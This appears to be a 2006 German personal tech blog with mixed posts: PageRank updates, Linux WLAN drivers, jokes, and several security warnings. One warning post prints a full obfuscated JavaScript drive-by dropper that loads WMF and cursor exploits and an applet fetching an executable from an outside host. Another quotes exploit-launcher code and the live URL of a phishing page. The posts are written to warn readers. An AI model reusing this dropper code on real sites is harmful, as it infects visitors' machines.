26 Februar 2006

What Type of Weather Are You?

Notiz an mich selbst:
Nicht immer allen Blödsinn mitmachen...

You Are Wind

wind
Strong and overpowering
A force to be reckoned with, no one dares cross you
You have the power to change everything around you

You are best known for: your wrath

Your dominant state: commanding



Wenn das stimmt, bin ich ja ein ganz umgänglicher Typ...

von Maik Irmscher um 19:07 1 Kommentare

23 Februar 2006

Gefälschte Telekom-Seite verbreitet Trojaner

Leider hatte ich gestern keine Zeit mehr noch etwas zu dem Artikel bei heise zu sagen, dies will ich nun aber nachholen:

Mittlerweile hat heise ja schon ein Update zu dem Artikel gebracht, allerdings hätte den Redakteuren bei heise beim Erstellen der ersten Meldung bereits auffallen können, dass die besagte Seite, die unter:
http://telekom-de4-8cgi.com/56982271633/cgi_pop/login.htm (bitte nicht aufrufen!!!)

zu finden ist, nicht nur für den Internet Explorer gefährlich ist.

Ganz nebenbei, der Inhalt der Seite die man dort sieht ist echt! Es handelt sich um ein Frameset, das die Originalseite der T-COM aufruft:
https://www.rechnung-online.telekom.de/dtroot/login/loginpage.htm

nur leider ruft die Seite noch ein weiteres Frame auf:
<frame src="ie0601.htm" name="topFrame" scrolling="NO" noresize >

Diese Datei ist dafür verantwortlich den Typ den Browsers, sowie einige weitere Daten über das System zu sammeln.
Je nach Browsertyp wird dann für den IE z.B. "ie0601e.wmf" aufgerufen.

Kommentar im Queltext:
// launching exploit which number is depends on Windows and IE versions

Allerdings ist auch folgendes im Quelltext zu finden:
else if (navigator.appName=="Netscape")

Dies hätte man nicht übersehen dürfen!
if (navigator.userAgent.indexOf('Firefox') != -1)
{
PageContainer.location="mfsa0601.htm";
}

Firefox und Mozilla sind also ebenso betroffen, wie der IE.

"Die Schwachstellen sind allerdings ab Firefox 1.0.5 und Mozilla 1.7.10 beseitigt."


Viele Grüße
Maik Irmscher
von Maik Irmscher um 18:12 0 Kommentare

Re: Google PageRank Update

Nach nunmehr 6 Tagen ist das PR-Update hingegen allen Behauptungen noch nicht! vollständig.

Nebenbei bemerkt wird dem PR meiner Meinung nach viel zu viel Gewichtung geschenkt.
Er ist zwar ein nettes Spielzeug und eine ca. Richtung ( || Anhaltspunkt) um die ungefähre popularität einer Webseite zu bestimmen, aber


  1. der PR ist nur stark bedingt für die Position in den SERP's (Search Engine Result Pages) verantwortlich und
  2. der in der Google-Toolbar angezeigte PageRank ist nicht der wirkliche, momentane PageRank, sondern nur ein Wert, der vor (im schlimmsten Fall) einigen Monaten ermittelt wurde, und mit der momentanen Popularität der Domain absolut nichts mehr zu tun haben kann.

Ich kann jedem, der sich mit soetwas beschäftig, nur empfehlen sich ein anderes Hobby zu suchen.

Viele Grüße
Maik Irmscher

von Maik Irmscher um 17:49 0 Kommentare

20 Februar 2006

Google PageRank Update

Das von vielen lang ersehnte PageRank Update hat am Samstag den 18.02.2006 begonnen. Nachdem das Letzte Update nun schon einige Zeit her (19.10.2005) ist, werden zur Zeit auf mehrenen DC's die neuen PageRanks angezeigt.

Neue Ergebnisse sind bereits auf folgenden DC's zu bewundern:

  • 66.102.11.99
  • 66.102.11.104
  • 64.233.185.99
  • 64.233.167.99
  • 64.233.167.147
  • 64.233.167.104
  • 216.239.63.104
  • 216.239.57.99
  • 216.239.57.98
  • 216.239.57.147
  • 216.239.57.105
  • 216.239.57.104
  • 216.239.53.99
  • 216.239.53.104

Aber keine Panik, das PageRank Update wird noch ein paar Tage lang vollzogen werden und die Ergebnisse sind erst dann zu erkennen.


Viele Grüße
Maik Irmscher
von Maik Irmscher um 11:45 0 Kommentare

15 Februar 2006

Rundumschutz-Paket von Microsoft

Windows OneCare Live lautet der Name des ab Juni verfügbaren Paketes, das Microsoft seinen Kunden in Zukunft im Kampf gegen Viren, Daten- und Leistungsverluste zum Preis von ca. 20$ verkaufen will.

OneCare erweitert das herkömmliche Sicherheits-Center in Windows XP unter anderem um einen integrierten Viren-Schutz, einen Backup-Dienst, der Nutzer-Daten auf externe Datenträger sichert, und um ein Tool zum Aufräumen und Defragmentieren der Festplatten.

Microsoft integriert dieses Produkt also nicht direkt in seine Windows-Versionen, sondern verlangt zusätzlich zum doch recht hohen Anschaffungspreis für seine Betriebssysteme nun noch einen Aufpreis für "mehr Sicherheit gegen die eigenen Programmierfehler".


Viele Grüße
Maik Irmscher
von Maik Irmscher um 13:22 0 Kommentare

13 Februar 2006

ICQ stellt Protokoll um

Viele Anwender der teilweise kostenlosen "alternativen Clients" wie Gaim, Trillian oder Miranda haben sich wahrscheinlich in den letzten Tagen gewundert, warum Nachrichten über ICQ verloren gingen und sonstige Stöhrungen in Zusammenhang mit ICQ auftraten.

Die Erklärung dafür ist, dass ICQ ohne Vorankündigung sein verwendetes Messaging-Protokoll umgestellt hat.

Es bleibt zu hoffen, dass so schnell wie möglich aktualisierte Versionen für die jeweiligen Clients verfügbar sein werden.



Viele Grüße
Maik Irmscher
von Maik Irmscher um 12:42 0 Kommentare

Islamistische Cracker greifen dänische Webseiten an

Die Proteste gegen die Karikaturen des Propheten Mohammed weiten sich ins Internet aus. Eine Serie von Angriffen gegen dänische und andere westliche Webseiten erschüttert seit kurzem das Internet.

Ca. 1.000 Angriffe gegen Webserver wurden durch Zone-H bereits gemeldet.

Für die Angriffe sind Cracker diverser muslimischer Hacker-groups verantwortlich, die dadurch Ihre meist extremistischen Manifeste publizieren.

Eine Gruppe, die sich selbst IIB (Internet Islamic Brigades) nennt, droht derweilen mit Selbstmordattentaten in Dänemark.



ohne Worte...
Maik Irmscher
von Maik Irmscher um 12:10 0 Kommentare

Linux findet immer mehr Akzeptanz

Positiv zu bemerken ist, dass sich mittlerweile immer mehr Hersteller sowohl von Hard-, als auch von Software dem Thema Linux widmen, so stellt z.B. Adobe seinen Acrobat Reader [1] in der Version 7 für die Plattform Linux vor. Weiterhin hat sich nun auch der Hersteller von Nerro Burning ROM mit der Version neroLINUX [2] an einer Linuxversion seines Bekannten Brennprogrammes versucht.

[1] ftp://ftp.adobe.com/pub/adobe/reader/unix/7x/7.0/enu/

[2] http://www.nero.com/de/NeroLINUX.html



Viel Spaß beim Testen
Maik Irmscher
von Maik Irmscher um 06:14 0 Kommentare

11 Februar 2006

Sicherheitslücken in CONFIXX bei Server4you (vServer)

Lassen sie keine Besucher auf ihren vServer, wenn sie keine Vorkehrungen getroffen haben ihr CONFIXX sicher zu machen.

Besitzer eines vServers von Server4you sollten lieber keine weiteren Benuzter an ihren Server lassen, denn die Dateien von CONFIXX, in denen unter anderem auch Logininformationenen für z.B. die Datenbanken hinterlegt sind, haben fast alle Leserechte für Jederman (644).

Besonders interessant in diesem Zusammenhang ist dabei die Datei:
/usr/local/confixx/confixx_main.conf

Abhilfe schafft eine genaue Suche nach allem, was mit CONFIXX zu tun hat und ggf. ein chmod o-r (640).



Viele Grüße
Maik Irmscher
von Maik Irmscher um 11:00 0 Kommentare

WLAN-Card SMC 2635W unter Linux

Da ADMtek keine eigene Seite mehr hat, sondern nur noch unter Infineon zu finden ist, gestaltete sich die Linuxtreiber-Beschaffung schwieriger als erwartet.

So läuft die WLAN-Card SMC 2635W über PCMCIA einwandfrei:


Systemeigenschaften:
------------------------

-Chipsatz: SIS 630

-WLAN-Card: SMC2635W

-Relevante Ausgaben von lspci:
0000:00:00.0 Host bridge: Silicon Integrated Systems [SiS] 630 Host (rev 11)
0000:00:01.0 ISA bridge: Silicon Integrated Systems [SiS] SiS85C503/5513 (LPC Bridge)
0000:00:08.0 CardBus bridge: Texas Instruments PCI1225 (rev 01)
0000:00:08.1 CardBus bridge: Texas Instruments PCI1225 (rev 01)

-Relevante Ausgaben von dmesg:
adm8211: Copyright 2003, Jouni Malinen; Copyright 2004, Michael Wu
adm8211: release 20041122
Yenta: CardBus bridge found at 0000:00:08.0 [1071:7120]
Yenta: Enabling burst memory read transactions
Yenta: Using CSCINT to route CSC interrupts to PCI
Yenta: Routing CardBus interrupts to PCI
Yenta TI: socket 0000:00:08.0, mfunc 0x01001000, devctl 0x66
Yenta: ISA IRQ mask 0x0098, PCI irq 9
Socket status: 30000006
Yenta: CardBus bridge found at 0000:00:08.1 [1071:7120]
Yenta: Using CSCINT to route CSC interrupts to PCI
Yenta: Routing CardBus interrupts to PCI
Yenta TI: socket 0000:00:08.1, mfunc 0x01001000, devctl 0x66
Yenta: ISA IRQ mask 0x0098, PCI irq 9
Socket status: 30000006
---
PCI: Enabling device 0000:02:00.0 (0000 -> 0003)
PCI: Setting latency timer of device 0000:02:00.0 to 64
0000:02:00.0 (adm8211): EEPROM type: 93C66
0000:02:00.0 (adm8211): Channel range: 1 - 11
0000:02:00.0 (adm8211): RFtype=1 BBPtype=1 Specific BBP=0 Transceiver=2
eth1: hwaddr 00:04:e2:7f:8e:d4, IRQ 9, Rev 0x20, PCI ID: 0x82111317

-Verwedeter Treiber fuer die WLAN-Card:
adm8211-20041122.tar.bz2
(Driver name : PCI & Cardbus : 8211.o)
Der auf dem SMC2635W untergebrachte Chipsatz ist ein ADM8211 von ADMtek.
Bei dem verwendeten Triber handelt es sich um den "GPL adm8211 driver for Linux".

-Relevante installierte Module:
pcmcia_core
adm8211
yenta_socket
ds

-Relevante Ausgaben von lsmod:
ds 14084 4
yenta_socket 18816 0
adm8211 57024 0
pcmcia_core 57124 2 ds,yenta_socket

-Zusaetzlich benötigte Kernel Optionen:
CONFIG_ISA=y (für die pcmcia-card)
CONFIG_CRYPTO_ARC4=y (fuer die WLAN-Verschluesselung)

-Installierte Debian-Tools:
pcmcia-cs - PCMCIA Card Services for Linux (hier sind die Treiber für den Texas Instruments PCI1225 enthalten)
hotplug - Linux Hotplug Scripts
wireless-tools - Tools for manipulating Linux Wireless Extensions



-------------------------------------------------------------------------------------------------
Einige Wichtige Adressen:

Linux.Wireless.drivers.802.11b

http://www.espina.info/papers/officeconnect/

http://aluminum.sourmilk.net/adm8211/



Viele Grüße
Maik Irmscher
von Maik Irmscher um 10:46 0 Kommentare

Sicherheitsprobleme in Teamspeak

Das von Teamspeak Systems aus Essen programmierte und gerade in der Spiele-Szene sehr beliebte Tool für die "tastaturlose Kommunikation" weist erhebliche Mängel im Umgang mit den Passwörtern der registrierten User auf.

(Serverversion für Linux mit dem Namen ts2_server_rc2_20201)

Sämtliche Einstellungen werden in einer Datei Names server.dbs verwaltet. In dieser finden sich auch die Benutzernamen mit den dazugehörigen Passwörtern in Klartext. Unter diesen Benutzernamen sind auch die Logindaten der Admin- und Superadmin-User.Bei der Konfiguration / Installation sollte also drigend darauf geachtet werden, dass kein Unbefugter Leserechte auf diese Datei besitzt.

Eine Chiffrierung der Passwörter sollte Ziel folgender Versionen dieser Software sein.


Viele Grüße
Maik Irmscher
von Maik Irmscher um 00:16 0 Kommentare

Eine kleine Sammlung lustiger Sprüche

while (!asleep()) sheep++;

Life ain't fair, but the root password helps.

UNIX is like a wigwam: no windows, no gates, apache inside, stable.

This is Linux Land - In silent nights you can hear the windows machines rebooting

It`s not a trick...it`s Linux!

Was? Es gibt Google? Und man-pages? _Und_ HOWTO's? - Seit wann?

Only wimps use tape backup: real men just upload their important stuff on ftp, and let the rest of the world mirror it.

Yes, maybe life sucks, but at least I don't have to use Windows!

Why use Windows, when you can leave through the door?

Why do we hide from the Police daddy ? - They use Emacs, we use Vi!

UNIX ist ein benutzerfreundliches System. Es ist nur manchmal etwas eigen in der Auswahl seiner Freunde.

Viele Grüße
Maik Irmscher
von Maik Irmscher um 00:13 0 Kommentare

10 Februar 2006

xpl.wmf

"xpl.wmf" ist der Name der Datei, die man z.Zt. von vielen unseriösen Webseiten geschenkt bekommt. Leider ist die Datei mit dem bereits beschriebenen WMF-Exploit bestückt und somit überaus gefährlich. Glücklich schätzen kann sich derjenige, der nicht mit dem IE surft, denn dieser fühlt sich berufen die Datei ohne Umwege auszuführen.

Auf der besagten Seite befindet sich beispielsweise ein Iframe (ob gewollt, oder unbewusst) wie folgendes:

<iframe src="http://example.de" height="1" width="1"></iframe>



Von der Seite http://example.de wird nun folgendes Javascript ausgeführt:

<SCRIPT LANGUAGE="javascript" TYPE="text/javascript">
document.write(unescape("%3c%68%74%6d%6c%3e%0d%0a%3c%
68%65%61%64%3e%0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%66%
75%6e%63%74%69%6f%6e%20%63%6c%72%73%74"));
document.write(unescape("%61%74%28%29%7b%20%70%61%72%
65%6e%74%2e%73%74%61%74%75%73%20%3d%20%22%22%3b%7d%0d%
0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c"));
document.write(unescape("%2f%68%65%61%64%3e%0d%0a%0d%
0a%3c%62%6f%64%79%20%6c%61%6e%67%3d%45%4e%2d%55%53%20%
6c%69%6e%6b%3d%62%6c%75%65%20%76%6c%69"));
document.write(unescape("%6e%6b%3d%70%75%72%70%6c%65%
20%73%74%79%6c%65%3d%27%74%61%62%2d%69%6e%74%65%72%76%
61%6c%3a%2e%35%69%6e%27%3e%0d%0a%4c%6f"));
document.write(unescape("%61%64%69%6e%67%20%70%6c%65%
61%73%65%20%77%61%69%74%20%2e%2e%2e%0d%0a%20%20%3c%49%
46%52%41%4d%45%20%73%72%63%3d%22%78%70"));
document.write(unescape("%6c%2e%77%6d%66%22%0d%0a%20%
20%66%72%61%6d%65%62%6f%72%64%65%72%3d%31%20%76%73%70%
61%63%65%3d%31%20%68%73%70%61%63%65%3d"));
document.write(unescape("%31%20%6d%61%72%67%69%6e%77%
69%64%74%68%3d%31%20%6d%61%72%67%69%6e%68%65%69%67%68%
74%3d%31%20%77%69%64%74%68%3d%31%20%68"));
document.write(unescape("%65%69%67%68%74%3d%31%20%73%
63%72%6f%6c%6c%69%6e%67%3d%6e%6f%3e%0d%0a%20%20%3c%2f%
49%46%52%41%4d%45%3e%0d%0a%0d%0a%3c%2f"));
document.write(unescape("%62%6f%64%79%3e%0d%0a%3c%73%
74%79%6c%65%3e%0d%0a%2a%20%7b%43%55%52%53%4f%52%3a%20%
75%72%6c%28%22%68%74%74%70%3a%2f%2f%67"));
document.write(unescape("%61%6d%65%34%61%6c%6c%2e%62%
69%7a%2f%61%64%76%2f%30%31%38%2f%73%70%6c%6f%69%74%2e%
61%6e%72%22%29%7d%0d%0a%3c%2f%73%74%79"));
document.write(unescape("%6c%65%3e%0d%0a%3c%41%50%50%
4c%45%54%20%41%52%43%48%49%56%45%3d%27%63%6f%75%6e%74%
2e%6a%61%72%27%20%43%4f%44%45%3d%27%42"));
document.write(unescape("%6c%61%63%6b%42%6f%78%2e%63%
6c%61%73%73%27%20%57%49%44%54%48%3d%31%20%48%45%49%47%
48%54%3d%31%3e%0d%0a%3c%50%41%52%41%4d"));
document.write(unescape("%20%4e%41%4d%45%3d%27%75%72%
6c%27%20%56%41%4c%55%45%3d%27%68%74%74%70%3a%2f%2f%67%
61%6d%65%34%61%6c%6c%2e%62%69%7a%2f%61"));
document.write(unescape("%64%76%2f%30%31%38%2f%77%69%
6e%33%32%2e%65%78%65%27%3e%3c%2f%41%50%50%4c%45%54%3e%
0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%74"));
document.write(unescape("%72%79%7b%0d%0a%64%6f%63%75%
6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%
74%20%64%61%74%61%3d%60%26%23%31%30%39"));
document.write(unescape("%26%23%31%31%35%26%23%34%35%
26%23%31%30%35%26%23%31%31%36%26%23%31%31%35%26%23%35%
38%26%23%31%30%39%26%23%31%30%34%26%23"));
document.write(unescape("%31%31%36%26%23%31%30%39%26%
23%31%30%38%26%23%35%38%26%23%31%30%32%26%23%31%30%35%
26%23%31%30%38%26%23%31%30%31%26%23%35"));
document.write(unescape("%38%26%23%34%37%26%23%34%37%
26%23%36%37%26%23%35%38%26%23%39%32%26%23%31%30%32%3b%
6f%27%2b%27%6f%2e%6d%68%74%21%27%2b%27"));
document.write(unescape("%68%74%74%70%3a%2f%2f%67%61%
6d%65%34%61%6c%6c%2e%62%69%7a%2f%2f%61%64%76%2f%2f%30%
31%38%2f%2f%74%61%72%67%2e%63%68%27%2b"));
document.write(unescape("%27%6d%3a%3a%2f%74%61%72%67%
27%2b%27%65%74%2e%68%74%6d%60%20%74%79%70%65%3d%60%74%
65%78%74%2f%78%2d%73%63%72%69%70%74%6c"));
document.write(unescape("%65%74%60%3e%3c%2f%6f%62%27%
2b%27%6a%65%63%74%3e%27%29%3b%0d%0a%7d%63%61%74%63%68%
28%65%29%7b%7d%0d%0a%3c%2f%73%63%72%69"));
document.write(unescape("%70%74%3e%0d%0a%3c%2f%68%74%
6d%6c%3e"));

</SCRIPT>


Dieses Javascript Bringt den Browser nun dazu die Datei xpl.wmf aufzurufen, die vernünpftige Browser (nicht IE) dann zum Download anbieten.

Diese Datei enthät definitiv den Exploit:

./xpl.wmf: Exploit.WMF.A FOUND

MD5: 75cc5f135c74277d283a50e6b6beb545


Spielen Sie die Datei bitte nicht ab!


Informationen zum WMF-Format:

Windows Metafile (WMF) ist ein proprietäres Grafikformat. Es wurde entwickelt für den Austausch von Grafiken über verschiedene Programme hinweg. Dieses Grafikformat erlaubt es in den Metainformationen des Dokumentes ausführbaren Programmcode zu speichern und an Empfänger zu übermitteln. Werden Grafiken im WMF-Format abgespeichert, so tragen die Dateien die 3-buchstabige Dateierweiterung ".wmf".
In der WMF-Rendering-Engine gibt es eine Schwachstelle, die es einem entfernten Angreifer ermöglicht, beliebigen Code in WMF-Dateien mit Benutzerrechten auf betroffenen Systemen auszuführen.

Die Schwachstelle kann neben Windows Metafile (WMF) auch über Enhanced Metafile (EMF) Dateien ausgnutzt werden. Erfolgreiche Angriffe fanden bislang über E-Mail, hier insbesondere in Grusskarten zum neuen Jahr das Surfen im Internet und über gemeinsam genutzte Dateisysteme statt. Es reicht bereits die Vorschau einer schadhaften E-Mail oder einer schadhaften Datei im Windows Explorer aus, um den schadhaften Code auszuführen und nicht geschützte Systeme anzugreifen.

Häufig enthalten die infizierten WMF-Dateien keinerlei Bildinformationen sondern nur den schadhaften Programmcode. Weiterhin können auch umbenannte WMF-Dateien mit der anfälligen Komponente verarbeitet werden. So können Angreifer z. B. eine in ".JPG" umbenannte WMF-Datei für Angriffe einsetzen.

Weitere Informationen von den Seiten des BSI


Viele Grüße
Maik Irmscher
von Maik Irmscher um 03:47 0 Kommentare
Abonnieren Posts (Atom)